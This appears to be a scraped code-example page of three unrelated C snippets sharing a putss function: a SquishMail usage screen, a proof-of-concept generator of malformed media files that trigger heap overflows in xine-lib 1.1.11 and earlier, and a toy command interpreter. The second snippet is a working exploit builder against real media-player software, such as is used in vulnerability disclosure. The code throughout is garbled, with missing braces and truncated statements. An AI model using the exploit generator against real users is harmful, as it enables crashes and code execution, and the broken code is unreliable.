Esempio n. 1
void usage(void)
  char temp[50];

  putss("SquishMail can be started with any of the following commands:\n\n"

        "   SQUISH [IN] [OUT] [SQUASH] [LINK] [switches...]\n\n"

        "       Any or all of the above options may be specified on one command-line.\n"
        "       `IN' instructs Squish to toss (import) messages.  `OUT' instructs\n"
        "       Squish to scan (export) messages.  `SQUASH' instructs Squish to\n"
        "       pack/mash messages in the netmail area.  `LINK' instructs Squish to\n"
        "       relink reply chains.  Specifying `IN' and `OUT' together turns on\n"
        "       Squish's one-pass mode.\n\n"

        "   SQUISH RESCAN <area_tag> <node>              - Rescan area to node\n"
        "   SQUISH SEND <file> [TO] <node> [flavour]     - Attach file to node\n"
        "   SQUISH GET <file> [FROM] <node> [flavour]    - Request file from node\n"
        "   SQUISH UPDATE <file> [FROM] <node> [flavour] - Upd. request file from node\n"
        "   SQUISH POLL <node> [flavour]                 - Poll node\n\n");

  (void)printf("Press <enter> to continue: ");
  (void)fgets(temp, 50, stdin);

  putss("Command-line arguments supported by Squish are:\n\n"

        "   -a<areas_bbs>         - Use <areas_bbs> instead of the default AREAS.BBS\n"
        "   -c<config_file>       - Use <config_file> instead of SQUISH.CFG\n"
        "   -f<echotoss>          - Use <echotoss> to log areas (toss) or to link/scan\n"
        "   -l                    - Leave uncompressed packets in OUTBOUND.SQ\n"
        "   -n<log_file>          - Override the log file given in SQUISH.CFG\n"
        "   -o                    - When doing a `squash', process outbound area only\n"
        "   -q                    - Quiet mode.  Suppresses most informational displays\n"
        "   -s<tag>               - Override default scheduling, and run schedule <tag>\n"
        "   -t                    - Toggle secure mode\n"
        "   -u                    - Toggle TossBadMsgs mode\n"
        "   -v                    - Toggle statistics mode\n"
        "   -z                    - Only scan non-passthrough areas\n");

Esempio n. 2
int main(int argc, char *argv[]) {
    FILE    *fd;
    int     i,
    u8      *buff,

    setbuf(stdout, NULL);

        "xine-lib <= 1.1.11 multiple heap overflows "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "\n", stdout);

    if(argc < 3) {
            "Usage: %s <attack> <output_file>\n"
            " 1 = heap overflow in demux_flv (file.FLV)\n"
            " 2 = heap overflow in demux_qt (file.MOV)\n"
            " 3 = heap overflow in demux_real (file.RM)\n"
            " 4 = heap overflow in demux_wc3movie (file.MVE)\n"
            " 5 = heap overflow in ebml.c (file.MKV)\n"
            " 6 = heap overflow in demux_film.c (file.CAK)\n"
            "\n", argv[0]);

    attack = atoi(argv[1]);
    fname = argv[2];

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    p = buff;
    if(attack == 1) {
        p += putss(p, "FLV\x01");
        p += putxb(p, 9,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, FLV_TAG_TYPE_SCRIPT, 8);  // tag_type
        psize = p; p += 3;
        p += putxb(p, 0,            32);        // pts
        p += putxb(p, 0,            24);
        p += putxb(p, FLV_DATA_TYPE_OBJECT, 8);
        p += putxb(p, 13,           16);
        p += putss(p, "filepositions");
        p += putxb(p, FLV_DATA_TYPE_ARRAY, 8);
        p += putxb(p, 0x20000000,   32);
        for(i = 0; i < 4000; i++) {
            p += putxb(p, FLV_DATA_TYPE_NUMBER, 8);
            p += putxb(p, 0x4141414141414141ULL, 64);
        p += putxb(p, FLV_DATA_TYPE_ENDOBJECT, 8);  // useless
        putxb(psize, p - (psize + 3 + 4 + 3),   24);

    } else if(attack == 2) {
        p += putxb(p, 8000 - 24,    32);
        p += putxb(p, MOOV_ATOM,    32);
        p += putxb(p, 8000 - 16,    32);
        p += putxb(p, RMRA_ATOM,    32);
        p += putxb(p, 8000 - 8,     32);
        p += putxb(p, RDRF_ATOM,    32);
        p += putxb(p, 0,            32);    // i + 4
        p += putxb(p, 0,            32);    // i + 8
        p += putxb(p, 0xffffffff,   32);    // i + 12
        p += putcc(p, 'A',          8000 - 12);

    } else if(attack == 3) {
        p += putxb(p, RMF_TAG,      32);
        p += putxb(p, 8,            32);
        p += putxb(p, MDPR_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 0,            16);
        p += putxb(p, 1,            16);    // mdpr->stream_number
        p += putxb(p, 0,            32);    // mdpr->max_bit_rate
        p += putxb(p, 0,            32);    // mdpr->avg_bit_rate
        p += putxb(p, 0,            32);    // mdpr->max_packet_size
        p += putxb(p, 0,            32);    // mdpr->avg_packet_size
        p += putxb(p, 0,            32);    // mdpr->start_time
        p += putxb(p, 0,            32);    // mdpr->preroll
        p += putxb(p, 0,            32);    // mdpr->duration
        p += putxb(p, 0,            8);     // mdpr->stream_name_size
                                            // mdpr->stream_name
        p += putxb(p, 0,            8);     // 
                                            // mdpr->mime_type
        p += putxb(p, 8,            32);    // mdpr->type_specific_len
        p += putxb(p, VIDO_TAG,     32);    // mdpr->type_specific_data
        p += putxb(p, VIDO_TAG,     32);    // mdpr->type_specific_data
        putxb(psize, (p - psize) + 4, 32);
        p += putxb(p, PROP_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 0,            16);
        p += putxb(p, 0,            32);
        p += putxb(p, 1,            32);    // avg_bitrate
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);    // this->duration
        p += putxb(p, 0,            32);
        p += putxb(p, (p - buff) + 8 + 8 + DATA_CHUNK_HEADER_SIZE, 32); 
// this->index_start
        p += putxb(p, 0,            32);    // this->data_start
        putxb(psize, (p - psize) + 4, 32);
        p += putxb(p, DATA_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 0,            16);
        p += putxb(p, 0,            32);    // 
        p += putxb(p, 0,            32);    // 
        p += putxb(p, INDX_TAG,     32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            16);
        p += putxb(p, 0x15555556,   32);    // entries
        p += putxb(p, 1,            16);    // stream_num
        p += putxb(p, 0,            32);    // next_index_chunk
        for(i = 0; i < 4000; i++) {
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
        putxb(psize, (p - psize) + 4, 32);

    } else if(attack == 4) {
        p += putxb(p, FORM_TAG,     32);
        p += putxb(p, 0,            32);
        p += putxb(p, MOVE_TAG,     32);
        p += putxb(p, PC_TAG,       32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxi(p, 0x555556,     32);    // this->number_of_shots
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        for(i = 0; i < 80; i++) {
            p += putxb(p, PALT_TAG, 32);
            p += putxb(p, PALETTE_CHUNK_SIZE, 32);
            p += putcc(p, 13,     PALETTE_CHUNK_SIZE);  // -> 0x48

    } else if(attack == 5) {
        p += gst_ebml_write_element_id(p, EBML_ID_EBML);
        p += gst_ebml_write_element_size(p, 8000);  // not perfect
        p += gst_ebml_write_element_id(p, EBML_ID_DOCTYPE);
        p += gst_ebml_write_element_size(p, 0xffffffff);
        p += putcc(p, 'A',          8000);

    } else if(attack == 6) {
        p += putss(p, "FILM");
        p += 4;
        p += putss(p, "1.09");
        p += putxb(p, 0,            32);
        p += putxb(p, STAB_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 44100,        32);
        p += putxb(p, 0x71c71c8,    32);    // sizeof(film_sample_t) is 
36 bytes
        for(i = 0; i < 3000; i++) {
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
        putxb(psize, (p - psize) - 40,     32);
        putxb(buff + 4, (p - psize) - 8 - 16, 32);

    } else {
Esempio n. 3
void run_command() {
	is_cmd = 1;
	int size = str_len(command);
	if(str_startswith(command, "hlt") == 1) {
		text_color(BLACK, BLACK);
	} else if(str_startswith(command, "println")) {
		putslns(command, 8, size);
	} else if(str_startswith(command, "printvln")) {
		if(letti(command[9]) != -1)
	} else if(str_startswith(command, "printv")) {
		if(letti(command[7]) != -1)
	} else if(str_startswith(command, "print")) {
		putss(command, 6, size);
	} else if (str_startswith(command, "clear")) {
		index = 0;
    } else if(str_startswith(command, "setv")) {
		if(letti(command[5]) != -1) {
			int r = letti(command[5]);
			int i = 0;
			while(i < 7) {
				command[i] = ' ';
			reg[r] = atoi(command);
	} else if(str_startswith(command, "add")) {
		if(letti(command[4])!=-1 && letti(command[6])!=-1)
			reg[letti(command[4])] += reg[letti(command[6])];
	} else if(str_startswith(command, "sub")) {
		if(letti(command[4])!=-1 && letti(command[6])!=-1)
			reg[letti(command[4])] -= reg[letti(command[6])];
	} else if(str_startswith(command, "mul")) {
		if(letti(command[4])!=-1 && letti(command[6])!=-1)
			reg[letti(command[4])] *= reg[letti(command[6])];
	} else if(str_startswith(command, "div")) {
		if(letti(command[4])!=-1 && letti(command[6])!=-1)
			reg[letti(command[4])] /= reg[letti(command[6])];
	} else if(str_startswith(command, "mod")) {
		if(letti(command[4])!=-1 && letti(command[6])!=-1)
			reg[letti(command[4])] %= reg[letti(command[6])];
	} else if(str_startswith(command, "cc") == 1) {
		if(str_startswith(command, "cc help")) {
			putsln(">>> BLACK       :: 0");
			putsln(">>> BLUE        :: 1");
			putsln(">>> GREEN       :: 2");
			putsln(">>> CYAN        :: 3");
			putsln(">>> RED         :: 4");
			putsln(">>> MAGENTA     :: 5");
			putsln(">>> BROWN       :: 6");
			putsln(">>> LT GRAY     :: 7");
			putsln(">>> DK GRAY     :: 8");
			putsln(">>> LT BLUE     :: 9");
			putsln(">>> LT GREEN    :: A");
			putsln(">>> LT CYAN     :: B");
			putsln(">>> LT RED      :: C");
			putsln(">>> LT MAGENTA  :: D");
			putsln(">>> LT BROWN    :: E");
			putsln(">>> WHITE       :: F");
		} else {
			char b = command[4];
			char f = command[3];
			if(f > '@' && b > '@')
				text_color(f - '0', b - 55);
			else if(f > '@')
				text_color(f - 55, b - '0');
			else if(b > '@')
				text_color(f - '0', b - 55);
				text_color(f - '0', b - '0');
	} else if(str_startswith(command, "help") == 1) {
		putsln(">>> hlt          :: halts cpu");
		putsln(">>> cc fb|help   :: change text color - (fore, back)");
		putsln(">>> print text   :: print out a piece of text");
		putsln(">>> printv let   :: print out the value of variable let");
		putsln(">>> printvln let :: print out the value of variable let with a line after");
		putsln(">>> println text :: print out a piece of text with a line");
		putsln(">>> clear        :: Clears the screen");
		putsln(">>> setv let val :: set variable let to val");
		putsln(">>> add base set :: adds base to set and stores in base");
		putsln(">>> sub base set :: subtracts base from set and stores in base");
		putsln(">>> mul base set :: multiplies base by set and stores in base");
		putsln(">>> div base set :: divides base by set and stores in set");
		putsln(">>> mod base set :: divides base by set and stores remainder in set");
		putsln(">>> println text :: print out a piece of text with a line");
		putsln(">>> help         :: show help command");
	} else {
		puts(">>> Unknown command: ");
		putsln(">>> Try help.");
	is_cmd = 0;